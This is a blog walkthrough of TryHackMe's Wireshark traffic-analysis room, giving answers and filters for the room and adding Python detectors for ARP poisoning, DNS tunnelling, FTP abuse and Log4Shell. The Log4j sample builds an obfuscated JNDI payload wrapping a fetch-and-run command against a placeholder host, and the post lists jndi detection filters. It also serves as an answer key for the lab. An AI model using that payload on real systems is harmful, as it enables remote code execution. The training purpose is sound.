Wireshark | Traffic Analysis

👋 Hi, I'm Umamaheswari. Through this blog, I share visual walkthroughs and hands-on investigations on PCAP, phishing, Splunk, ELK, malware, and digital forensics, based on labs from TryHackMe, HackTheBox and CyberDefenders. Feel free to connect or ask questions; I am more than happy to help.

Task 2: Nmap Scans

Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file.

What is the total number of the "TCP Connect" scans?

Ans: 1000

Which scan type is used to scan the TCP port 80?

Ans: TCP Connect

How many "UDP close port" messages are there?

Ans: 1083

Which UDP port in the 55-70 port range is open?

Ans: 68

Hint: Remember, half of the traffic analysis is done by hand when using Wireshark. Filter the traffic as shown in the task, then filter the destination port (UDP) with the "filter a column" option. Finally, scroll through the packet list section and investigate the findings manually.

Task 3: ARP Poisoning & Man In The Middle!

Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file.
What is the number of ARP requests crafted by the attacker?

Ans: 284

Filter ARP requests (arp.opcode == 1) sent from the attacker's address (eth.src), then read the count from the status bar.

What is the number of HTTP packets received by the attacker?

Ans: 90

MITM: all HTTP traffic goes to the attacker. The destination IPs differ, but the destination MAC address is always the same (the attacker's).

What is the number of sniffed username&password entries?

Ans: 6

Hint: each HTTP POST normally carries one username and one password, and these are the POSTs going to the attacker's MAC address.

BUT "/secured/newuser.php" carries multiple usernames and passwords,

so include the URL in the filter to be specific.

What is the password of the "Client986"?

Ans: clientnothere!

Hint: the username appears in lowercase in the capture (client986).

What is the comment provided by the "Client354"?

Ans: Nice work!
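The two signals used above (ARP requests crafted by one MAC, and HTTP traffic whose destination IPs differ while the destination MAC stays the same) can be checked without Wireshark. The following is an added example, not part of the original walkthrough and not the room's Exercise.pcapng: it builds a small constructed libpcap file in memory (documentation addresses, all made up), parses Ethernet/ARP/IPv4 by hand, counts arp.opcode == 1 frames per source MAC, raises an arpwatch-style alert when a later ARP frame claims an IP that a different MAC claimed first (assumption: the capture starts before the poisoning), and reports the IPv4 frames that end up at each MAC that took over an IP.

```python
"""Pure-Python pcap reader plus two ARP-poisoning heuristics (added example)."""
import struct
from collections import Counter, defaultdict

# Constructed addresses (RFC 5737 / RFC 7042 documentation ranges), not from the lab.
ATTACKER_MAC = "00:00:5e:00:53:01"
VICTIM_MAC = "00:00:5e:00:53:02"
GATEWAY_MAC = "00:00:5e:00:53:03"
BROADCAST = "ff:ff:ff:ff:ff:ff"
VICTIM_IP, GATEWAY_IP = "192.0.2.10", "192.0.2.1"
WEB_IPS = ["203.0.113.5", "203.0.113.7", "203.0.113.9"]

def mac_bytes(m): return bytes.fromhex(m.replace(":", ""))
def ip_bytes(ip): return bytes(int(o) for o in ip.split("."))
def fmt_mac(b): return ":".join(f"{x:02x}" for x in b)
def fmt_ip(b): return ".".join(str(x) for x in b)

def arp_frame(opcode, src_mac, src_ip, dst_mac, dst_ip):
    """Ethernet II + ARP (hw type 1 = Ethernet, proto 0x0800 = IPv4). A real request
    carries zeros in the target MAC; the parser below never reads that field."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    arp += mac_bytes(src_mac) + ip_bytes(src_ip) + mac_bytes(dst_mac) + ip_bytes(dst_ip)
    return eth + arp

def ipv4_frame(src_mac, dst_mac, src_ip, dst_ip):
    """Ethernet II + a minimal 20-byte IPv4 header (no payload needed here)."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, 64, 6, 0,
                     ip_bytes(src_ip), ip_bytes(dst_ip))
    return eth + ip

def build_pcap(frames):
    """libpcap file: 24-byte global header (linktype 1 = Ethernet), 16-byte record headers."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out

def frames_from_pcap(data):
    if struct.unpack_from("<I", data, 0)[0] != 0xA1B2C3D4:
        raise ValueError("only little-endian microsecond pcap is handled here")
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, caplen, _origlen = struct.unpack_from("<IIII", data, off)
        yield data[off + 16: off + 16 + caplen]
        off += 16 + caplen

def decode(frame):
    rec = {"dst_mac": fmt_mac(frame[0:6]), "src_mac": fmt_mac(frame[6:12])}
    etype = struct.unpack_from("!H", frame, 12)[0]
    if etype == 0x0806:  # ARP: opcode at 20, sender MAC at 22, sender IP at 28
        rec.update(type="arp", opcode=struct.unpack_from("!H", frame, 20)[0],
                   sender_mac=fmt_mac(frame[22:28]), sender_ip=fmt_ip(frame[28:32]))
    elif etype == 0x0800:  # IPv4: src/dst at header offsets 12/16 (frame 26/30)
        rec.update(type="ipv4", src_ip=fmt_ip(frame[26:30]), dst_ip=fmt_ip(frame[30:34]))
    return rec

def analyse(pcap_bytes):
    """ARP request count per source MAC, IP->MAC takeover alerts, traffic to suspects."""
    arp_requests = Counter()
    baseline = {}                 # first MAC seen claiming each IP (sender fields)
    takeovers = defaultdict(set)  # ip -> later, different MACs claiming it
    to_mac = defaultdict(lambda: {"frames": 0, "dst_ips": set()})
    for frame in frames_from_pcap(pcap_bytes):
        rec = decode(frame)
        if rec.get("type") == "arp":
            if rec["opcode"] == 1:
                arp_requests[rec["src_mac"]] += 1
            ip, mac = rec["sender_ip"], rec["sender_mac"]
            if baseline.setdefault(ip, mac) != mac:
                takeovers[ip].add(mac)
        elif rec.get("type") == "ipv4":
            to_mac[rec["dst_mac"]]["frames"] += 1
            to_mac[rec["dst_mac"]]["dst_ips"].add(rec["dst_ip"])
    suspects = {m for macs in takeovers.values() for m in macs}
    return {"arp_requests": dict(arp_requests),
            "takeovers": {ip: sorted(macs) for ip, macs in takeovers.items()},
            "suspect_traffic": {m: to_mac[m] for m in suspects}}

def sample_capture():
    """Constructed: the gateway speaks first, then the attacker floods requests claiming
    the gateway IP, and the victim's web traffic to three servers lands on its MAC."""
    frames = [arp_frame(1, GATEWAY_MAC, GATEWAY_IP, BROADCAST, VICTIM_IP),
              arp_frame(2, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
              ipv4_frame(VICTIM_MAC, GATEWAY_MAC, VICTIM_IP, WEB_IPS[0])]
    frames += [arp_frame(1, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)] * 5
    frames += [ipv4_frame(VICTIM_MAC, ATTACKER_MAC, VICTIM_IP, ip) for ip in WEB_IPS]
    return build_pcap(frames)

if __name__ == "__main__":
    print(analyse(sample_capture()))
```

The first-seen baseline is the same trick arpwatch uses; if the capture begins after the poisoning started, the attacker's MAC becomes the baseline and the legitimate gateway is the one flagged, so always confirm against the MAC that sends the burst of ARP requests.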

Task 4: Identifying Hosts: DHCP, NetBIOS and Kerberos

Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file.

What is the MAC address of the host "Galaxy A30"?

Ans: 9a:81:41:cb:96:6c

In the DHCP protocol section, find the Host Name field and add it as a column (optional).

Right-click the Ethernet MAC address --> Copy --> Value.

How many NetBIOS registration requests does the "LIVALJM" workstation have?

Ans: 16

This gives both types of requests, Registration NB and Name query, so let's keep only Registration.

The request type is specified in the opcode field: right-click it --> Apply as Filter --> Selected.

(This adds the selected opcode to the query.)

Which host requested the IP address "172.16.13.85"?

Ans: Galaxy-A12

When a host asks for a particular IP address ("I want this IP"), the DHCP server checks its pool; if that address is available, it assigns it to the host.

In the DHCP protocol section, the requested address is stored in the Requested IP Address option.

Right-click it --> Prepare as Filter --> Selected, then change the IP address in the filter to 172.16.13.85.

Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap" file.

What is the IP address of the user "u5"? (Enter the address in defanged format.)

Ans: 10[.]1[.]12[.]2

What is the hostname of the available host in the Kerberos packets?

Ans: xp1$

  • CNameString: the username.

Note: some packets provide hostname information in this field instead. To avoid the confusion, filter on the "$" character: values ending with "$" are hostnames (machine accounts), and the ones without it are user names.

Task 5: Tunneling Traffic: DNS and ICMP

Use the "Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap" file.

Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?

Ans: ssh

Hint: filter with data.len > 200 and icmp, then read the data bytes in the ASCII view.

Use the "Desktop/exercise-pcaps/dns-icmp/dns.pcap" file.

Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)

Ans: dataexfil[.]com

Filter on dns and look for a suspicious domain: the main domain stays the same while the subdomains are long base64-encoded strings.

Filter on this domain alone to see how many requests go to it: 10096 packets.
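The traits spotted by eye above (one main domain, thousands of queries, long high-entropy subdomains that never repeat) are exactly what a DNS-tunnelling detector scores. The following is an added example, not part of the original walkthrough and not run against the room's dns.pcap: it groups constructed query names by registered domain (assumption: a two-label suffix, where real code would use the Public Suffix List) and flags a domain when query count, average subdomain length, unique-subdomain ratio and average Shannon entropy all exceed thresholds. The tunnel sample uses base32 chunks of made-up data under the reserved name exfil-test.example; the scoring does not depend on which encoding the tunnel uses.

```python
"""Per-domain DNS query profiling for tunnelling/exfiltration traits (added example)."""
import base64
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character: ~0-2.5 for ordinary labels, >4 for base32/base64 chunks."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def registered_domain(qname):
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])  # assumption: two-label suffix, no Public Suffix List


def profile_dns(qnames, min_queries=5, min_avg_len=30,
                min_unique_ratio=0.8, min_entropy=3.0):
    """Group queries by registered domain and score each group."""
    subs_by_domain = defaultdict(list)
    for q in qnames:
        q = q.rstrip(".").lower()
        dom = registered_domain(q)
        subs_by_domain[dom].append(q[:-len(dom)].rstrip("."))
    report = {}
    for dom, subs in subs_by_domain.items():
        labels = [s for s in subs if s]  # drop bare queries for the apex itself
        avg_len = sum(map(len, labels)) / len(labels) if labels else 0.0
        avg_ent = sum(map(shannon_entropy, labels)) / len(labels) if labels else 0.0
        unique_ratio = len(set(labels)) / len(subs)
        report[dom] = {
            "queries": len(subs),
            "avg_subdomain_len": round(avg_len, 1),
            "avg_entropy": round(avg_ent, 2),
            "unique_ratio": round(unique_ratio, 2),
            "suspicious": (len(subs) >= min_queries and avg_len >= min_avg_len
                           and unique_ratio >= min_unique_ratio and avg_ent >= min_entropy),
        }
    return report


def sample_qnames():
    """Constructed: a few benign lookups plus 20 base32 chunks of fake file data
    carried as subdomains of exfil-test.example (not the lab's domain)."""
    benign = ["www.example.com", "mail.example.com", "www.example.com",
              "cdn.example.com", "www.example.com", "login.example.com"]
    tunnel = []
    for i in range(20):
        chunk = hashlib.sha256(f"chunk{i}".encode()).digest()  # stand-in for file bytes
        label = base64.b32encode(chunk).decode().rstrip("=").lower()  # 52 chars, under the 63 limit
        tunnel.append(f"{label}.exfil-test.example")
    return benign + tunnel


if __name__ == "__main__":
    for dom, stats in profile_dns(sample_qnames()).items():
        print(dom, stats)
```

The thresholds are deliberately conservative; CDNs and some anti-virus vendors also generate long, unique subdomains, so in practice the flagged domains are a triage list, not a verdict.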

Task 6: Cleartext Protocol Analysis: FTP

Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file.
How many incorrect login attempts are there?

Ans: 737

ftp.response.code == 530 : to check incorrect login attempts

What is the size of the file accessed by the "ftp" account?

Ans: 39424

A client has to log in successfully before it can access, upload or change files, so filter for successful logins first.

Follow stream: you can select any packet of the conversation between these two IPs (not only the successful-login packet).

It reassembles all packets in that connection (the conversation between the two IP:port pairs) and shows them as one continuous exchange, like reading the full message history between client and server.

Alternatively, to check the file size requested in any FTP connection, look for response code 213 (File status).

The adversary uploaded a document to the FTP server. What is the filename?

Ans: resume.doc

I think he uploaded the README file, not resume.doc.

All he did: download resume.doc (RETR), MDTM (checking the modification date and time), CWD uploads (changing directory), upload the README file (STOR), then make a directory named testdir and delete testdir again, cd /, and try to give more permissions to resume.doc (chmod 777) to read, access and execute the file, BUT this account (an anonymous login here) has no privilege to change or modify file permissions.

The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?

Ans: CHMOD 777
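Following the stream by hand works for one session; for a capture with hundreds of sessions it helps to parse the control channel. The following is an added example, not part of the original walkthrough and not run against the room's ftp.pcap: it walks a constructed control-channel exchange (the usernames, filenames and the 12288-byte size are made up), pairs each client command with the server reply that follows it, and collects failed logins (530 after PASS), successful logins (230), SIZE answers (213), RETR/STOR transfers and SITE commands with their reply codes. Pairing the 530 with the preceding PASS is slightly stricter than ftp.response.code == 530, which also counts the "not logged in" rejections a server sends for commands issued before any login.

```python
"""FTP control-channel session parser over a reassembled stream (added example)."""
import re

_REPLY = re.compile(r"^(\d{3})([ -])(.*)$")  # "230 text" is final, "230-text" is a continuation


def parse_ftp_stream(lines):
    """lines: (side, text) pairs, side 'C' for client or 'S' for server.
    Each server reply is interpreted in the light of the last client command."""
    result = {"failed_logins": 0, "logins": [], "sizes": {}, "transfers": [], "site": []}
    user, pending = None, None
    for side, text in lines:
        if side == "C":
            verb, _, arg = text.strip().partition(" ")
            verb = verb.upper()
            if verb == "USER":
                user = arg
            pending = (verb, arg)
            continue
        m = _REPLY.match(text.strip())
        if not m or m.group(2) == "-" or pending is None:
            continue  # not a reply, a multi-line continuation, or nothing to pair with
        code, msg = int(m.group(1)), m.group(3)
        verb, arg = pending
        if verb == "PASS":
            if code == 530:                      # "Login incorrect"
                result["failed_logins"] += 1
            elif code == 230:                    # logged in
                result["logins"].append(user)
        elif verb == "SIZE" and code == 213:     # 213 File status: size in bytes
            result["sizes"][arg] = int(msg)
        elif verb in ("RETR", "STOR") and code in (125, 150):  # data connection opened
            result["transfers"].append((verb, arg, user))
        elif verb == "SITE":                     # e.g. SITE CHMOD 777 file
            result["site"].append((arg, code))
    return result


def sample_stream():
    """Constructed control-channel exchange, not the lab's ftp.pcap."""
    return [
        ("C", "USER admin"), ("S", "331 Please specify the password."),
        ("C", "PASS Passw0rd"), ("S", "530 Login incorrect."),
        ("C", "USER admin"), ("S", "331 Please specify the password."),
        ("C", "PASS letmein"), ("S", "530 Login incorrect."),
        ("C", "USER ftp"), ("S", "331 Please specify the password."),
        ("C", "PASS mozilla@"), ("S", "230-Welcome."), ("S", "230 Login successful."),
        ("C", "SIZE notes.doc"), ("S", "213 12288"),
        ("C", "RETR notes.doc"),
        ("S", "150 Opening BINARY mode data connection for notes.doc (12288 bytes)."),
        ("S", "226 Transfer complete."),
        ("C", "CWD uploads"), ("S", "250 Directory successfully changed."),
        ("C", "STOR tool.sh"), ("S", "150 Ok to send data."),
        ("S", "226 Transfer complete."),
        ("C", "SITE CHMOD 777 tool.sh"), ("S", "550 SITE CHMOD command failed."),
    ]


if __name__ == "__main__":
    print(parse_ftp_stream(sample_stream()))
```

The (side, text) pairs are what you get from Follow --> TCP Stream when you save the two directions separately; on a real capture, run the parser once per control connection (each client port is a separate session).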

Task 7: Cleartext Protocol Analysis: HTTP

For cleartext protocols (HTTP, HTTP2), the useful filters are the request methods (GET/POST), the response codes, and the URI contents (http.request.uri contains ...).

Use the "Desktop/exercise-pcaps/http/user-agent.cap" file.

Investigate the user agents. What is the number of anomalous "user-agent" types?

Ans: 6

There are 6 user-agent types in total: nmap, sqlmap, mozilla, wfuzz, google chrome, microsoft.

What is the packet number with a subtle spelling difference in the user agent field?

Ans: 52

Use the "Desktop/exercise-pcaps/http/http.pcapng" file.

Locate the "Log4j" attack starting phase. What is the packet number?

Ans: 444

Press Ctrl+Alt+7 to display the time column in UTC date and time format (View --> Time Display Format).

Start with these filters to find the Log4j attack:

  • http.request.method == "POST"

  • (ip contains "jndi") or (ip contains "Exploit")

  • (frame contains "jndi") or (frame contains "Exploit")

  • (http.user_agent contains "$") or (http.user_agent contains "==")

Locate the "Log4j" attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude "{}".)

Ans: 62[.]210[.]130[.]250

Follow the HTTP stream, copy the base64-encoded string and use CyberChef:

  • to decode: From Base64

  • to defang: Defang URL
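The manual steps above (find the jndi lookup, pull out the base64 blob, decode it, defang the address) are easy to script, and a script also handles the obfuscated forms that a plain "jndi" string filter misses. The following is an added example, not part of the original walkthrough and not run against the room's http.pcapng: it resolves the common lookup tricks (${lower:j}, ${upper:j}, ${::-j} and ${env:X:-j} default values) and URL-encoding until the string is stable, matches the normalised ${jndi:<scheme>://<host>[:port]<path>} form, decodes a JNDIExploit-style /Basic/Command/Base64/<b64> path, and defangs the host. The request, the callback address 192.0.2.44 and the staged command are constructed for this example.

```python
"""Log4Shell (${jndi:...}) detection, payload decoding and defanging (added example)."""
import base64
import re
from urllib.parse import quote, unquote

# Collapse the lookups used to hide the jndi keyword, innermost first:
# ${lower:j} -> j, ${upper:j} -> J, ${::-j} or ${env:NOPE:-j} -> j (default value).
_LOWER = re.compile(r"\$\{lower:([^{}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^{}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# Once normalised, the lookup always reads ${jndi:<scheme>://<host>[:port]<path>}
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)(?::(\d+))?([^}]*)\}", re.I)
_B64 = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def normalise(value):
    """Undo URL-encoding, then resolve nested lookups until nothing changes."""
    v = unquote(value)
    while True:
        new = _LOWER.sub(lambda m: m.group(1).lower(), v)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == v:
            return v
        v = new


def defang(host):
    return host.replace(".", "[.]")


def find_jndi(fields):
    """fields: {field_name: raw_value} for the URI, headers and body of one request.
    Returns one finding per JNDI lookup, with the staged command decoded when the
    path follows the JNDIExploit /Basic/Command/Base64/<b64> convention."""
    findings = []
    for name, raw in fields.items():
        for m in _JNDI.finditer(normalise(raw)):
            scheme, host, port, path = m.groups()
            finding = {"field": name, "scheme": scheme.lower(), "host": host,
                       "port": int(port) if port else None,
                       "defanged": defang(host), "command": None}
            b = _B64.search(path)
            if b:
                try:
                    finding["command"] = base64.b64decode(b.group(1)).decode("utf-8", "replace")
                except ValueError:
                    pass  # malformed base64: keep the finding, drop the command
            findings.append(finding)
    return findings


def sample_request():
    """Constructed request, not from the lab's http.pcapng. The callback address
    192.0.2.44 (documentation range) and the staged command are made up."""
    cmd = "wget http://192.0.2.44/x.sh -O /tmp/x.sh; sh /tmp/x.sh"
    b64 = base64.b64encode(cmd.encode()).decode()
    payload = "${${lower:j}ndi:${lower:l}dap://192.0.2.44:1389/Basic/Command/Base64/" + b64 + "}"
    return {
        "uri": "/login?user=" + quote(payload, safe=""),          # URL-encoded in the query
        "User-Agent": payload,                                     # raw in the header
        "Referer": "https://www.example.com/",                     # benign control
        "X-Api-Version": "${${::-j}ndi:rmi://192.0.2.44:1099/a}",  # default-value trick
    }


if __name__ == "__main__":
    for f in find_jndi(sample_request()):
        print(f)
```

Feed it every request field, not just User-Agent: the lookup fires wherever the application logs attacker-controlled input, which is why the walkthrough's filters search ip and frame contents rather than one header.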

Task 8: Encrypted Protocol Analysis: Decrypting HTTPS

Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file.

What is the frame number of the "Client Hello" message sent to "accounts.google.com"?

Ans: 16

Hint: "Protocol Details Pane --> TLS --> Handshake Protocol --> Extension: server_name" can help.

Decrypt the traffic with the "KeysLogFile.txt" file. What is the number of HTTP2 packets?

Ans: 115

Adding key log files with the "Edit --> Preferences --> Protocols --> TLS"

http2: now we can view the decrypted traffic, and the filter gives the HTTP2 packet count.

Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)

Ans: safebrowsing[.]googleapis[.]com

Investigate the decrypted packets and find the flag! What is the flag?

Hint: you can export objects after decrypting the traffic (File --> Export Objects --> HTTP).

Task 9: Bonus: Hunt Cleartext Credentials!

Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file.

What is the packet number of the credentials using "HTTP Basic Auth"?

Ans: 237

What is the packet number where "empty password" was submitted?

Ans: 170

Hint: the Credentials window (Tools --> Credentials) only shows the usernames, not the passwords. Select the username to jump to the corresponding packet, then right-click it and choose Follow --> TCP Stream; this displays the entire conversation between the two hosts, including the password used.

Task 10: Bonus: Actionable Results!

You have identified a malicious packet in Wireshark; it contains the attacker's IP (source IP), or maybe their MAC address or port number.
Now you want to block that attacker from sending traffic to your network again.
Select the packet containing the attacker's IP, go to Tools --> Firewall ACL Rules, and choose your firewall type.
Make sure "Inbound" and "Deny" are checked. Then select the rule you want to apply and execute it or export it to block the attacker's traffic.

Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file.

Select packet number 99. Create a rule for "IPFirewall (ipfw)". What is the rule for "denying source IPv4 address"?

Ans: add deny ip from 10.121.70.151 to any in

Select packet number 231. Create "IPFirewall" rules. What is the rule for "allowing destination MAC address"?

Ans: add allow MAC 00:d0:59:aa:af:80 any in

Uncheck "Deny" to get the allow rule.

Congratulations! You just finished the Wireshark: Traffic Analysis room.

If you like this content, make sure you visit the following rooms on TryHackMe later on:

I would recommend learning in the following order:

  1. Tcpdump, Wireshark, Network-Miner

  2. Snort and Its challenges

  3. Zeek and its challenges

  4. Brim

Use the search option to find them! Happy Hunting!